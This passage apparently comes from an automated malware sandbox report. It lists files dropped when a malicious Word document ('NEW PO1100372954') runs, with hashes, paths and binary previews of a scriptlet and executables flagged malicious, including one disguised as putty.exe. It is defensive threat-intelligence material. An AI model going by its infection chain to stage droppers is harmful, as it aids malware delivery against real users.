                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):5.821101833795217
                                Encrypted:false
                                SSDEEP:384:3ymxaIgzzacasapa2hoygn1VYdNl6UnRJbtqEEE6oEaE3/nh:3ymxaPzacasapa2vgnrYdNl6Un7ZFPWb
                                MD5:EAF98295C742E17B01760B98BDB04235
                                SHA1:E729C9F20DCF8AC722517FCADD4D87BEDE21F49E
                                SHA-256:4F4EAAF614069BBFC3977DB75BD69A32A4BA95E5AD1A8B28348E4051A16D10A6
                                SHA-512:E2BDF0C22670A538D38A8AD8C0AA9DF59B253BDF3C49CA4724650382F490642C99134024F13AAD64B02D5EDC42B6A4759D10156ABE1E9274DC977C2270C57E48
                                Malicious:true
                                Reputation:unknown
                                Preview: ..<scriptleT.. >.. .......................... .............. ................. ........ ................. ...... ..............'... .............. ........... ........... ................... ...... ........ ........... ............ ...... .................... ........... ............ ...... ............'... ............................ ...... ........ ........... ................. ...... ........... ........ ...................... .................... ......... ......................... ..
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT:Zone.Identifier
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27
                                Entropy (8bit):3.9582291686698787
                                Encrypted:false
                                SSDEEP:3:gAWY3W:qY3W
                                MD5:833C0EFD3064048FD6A71565CA115CCD
                                SHA1:0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
                                SHA-256:4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
                                SHA-512:536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
                                Malicious:false
                                Reputation:unknown
                                Preview: [ZoneTransfer]..ZoneId=3..3
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                                MD5:0FBED11864C03FDED0E70014DCF84578
                                SHA1:453723D938A03252F705B0A104986FE4C5CA7056
                                SHA-256:70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
                                SHA-512:DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
                                Malicious:false
                                Reputation:unknown
                                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:International EBCDIC text, with no line terminators, with overstriking
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:fw8:L
                                MD5:D3A8D9A8FD8375694BCBA2EC51445C4C
                                SHA1:A03346DBB4462D95874BDDCAD43170DCEEEF6D43
                                SHA-256:70665DB3A770558DC9DABFA25D640E9FF4692BA75CCF7975C726786ACA624582
                                SHA-512:EE6A992578524486D72CBCBF2240C3A0FE32A1C4AD72736B7834E22741A223BBF233BAECFF2A0460A6D60E9ED7023F25D62650257E2121ECC4AF34D0C7ADA628
                                Malicious:true
                                Reputation:unknown
                                Preview: ...o.U.H
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                Malicious:false
                                Reputation:unknown
                                Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NEW PO1100372954 -.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Mon Aug 2 16:59:36 2021, length=234750, window=hide
                                Category:dropped
                                Size (bytes):2108
                                Entropy (8bit):4.563563676778922
                                Encrypted:false
                                SSDEEP:48:8it+/XT0jFx1aCZwfY2it+/XT0jFx1aCZwfc:8it+/XojFHDwfY2it+/XojFHDwfc
                                MD5:63DA06EC5F4B14A27137DD323B31070F
                                SHA1:CC221AF186196FB5381FCFEB99E975DAC5666D43
                                SHA-256:9E42FBE9B5CFF3DD2749ABC139522936D6BCB28E5FB70D919750E51F80768895
                                SHA-512:D8DB266A0FA3B50F475FE5FA5463751147B3F74BD2BA91CEE3CDEEB23B434CE8BCCC8089CCB4718A3C57CD433D73D329B104CAF3B454159F3BF3EDA4796BCC96
                                Malicious:false
                                Reputation:unknown
                                Preview: L..................F.... ...-....{..-....{.....'................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......Ss. .NEWPO1~1.DOC..Z.......Q.y.Q.y*...8.....................N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\NEW PO1100372954 -.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):92
                                Entropy (8bit):4.571374526629979
                                Encrypted:false
                                SSDEEP:3:M1LSUPkcQjOru4oziUPkcQjOru4omX1LSUPkcQjOru4ov:MVnP66ru443P66ru4DnP66ru4y
                                MD5:0865393879B83EFC01FD7C549E71A9A5
                                SHA1:899AE6A283B9B9F0F62475C18E135B09397ED727
                                SHA-256:967255627D9D9D210D5279B8DAFF2975BE25A21A3E7E1E756896AEEF41B4751C
                                SHA-512:E8FA619372F9FDCF50114BF8C42C56163ECA7E325BFF8C72F9E1685D79E70FEF45A7270420576110EB1C382D70A2B1EB8F44A788451A852B0F5BCBD5F7D628CE
                                Malicious:false
                                Reputation:unknown
                                Preview: [doc]..NEW PO1100372954 -.LNK=0..NEW PO1100372954 -.LNK=0..[doc]..NEW PO1100372954 -.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:Qn:Qn
                                MD5:F3B25701FE362EC84616A93A45CE9998
                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                Malicious:false
                                Reputation:unknown
                                Preview: ..
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\490281AC8GSCNCH37UYE.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LOCAUF6YJEF7K6W8Y37G.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RA5AG9965KYDVANTRM0T.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Roaming\putty.exe
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Roaming\zbEIIaj.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.7798653713156546
                                Encrypted:false
                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                Malicious:false
                                Reputation:unknown
                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\zzoj.CG.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):35549
                                Entropy (8bit):6.06431092799383
                                Encrypted:false
                                SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                SHA1:2814763828D036134EEF93F28D6C499913E903AA
